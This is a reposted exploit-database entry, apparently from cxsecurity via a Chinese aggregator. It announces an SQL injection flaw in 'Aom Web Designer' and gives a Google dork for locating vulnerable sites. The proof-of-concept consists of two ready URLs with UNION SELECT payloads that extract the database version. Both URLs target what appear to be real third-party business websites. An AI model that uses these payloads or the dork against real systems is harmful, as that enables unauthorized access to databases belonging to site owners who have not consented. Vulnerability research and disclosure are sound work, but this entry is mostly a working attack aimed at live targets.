Aom Web Designer 存在 SQL 注入漏洞,允许攻击者通过构造特定请求获取数据库版本信息。该漏洞由 Behrouz Mansoori 发现并验证于 Mac 和 Firefox 环境。 2025-4-24 16:55:10 Author: cxsecurity.com(查看原文) 阅读量:7 收藏
Aom Web Designer - Sql Injection
********************************************************* #Exploit Title: Aom Web Designer - Sql Injection #Date: 2025-04-23 #Exploit Author: Behrouz Mansoori #Google Dork: "Aom Web Designer" #Category:webapps #Tested On: Mac, Firefox Proof of Concept: ### Demo : https://www.aitareyastudio.com/product-detail.php?id=-4%27%20UNION%20SELECT%201,2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16,17,18--+ https://www.tridentventuresindia.in/sub-product.php?id=-3%27%20union%20select%201,2,3,version(),5,6--+ ********************************************************* #Discovered by: Behrouz mansoori #Instagram: Behrouz_mansoori #Email: [email protected] *********************************************************
Thanks for you comment!
Your message is in quarantine 48 hours.
{{ x.nick }}
{{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1 {{ x.comment }} |
如有侵权请联系:admin#unsafe.sh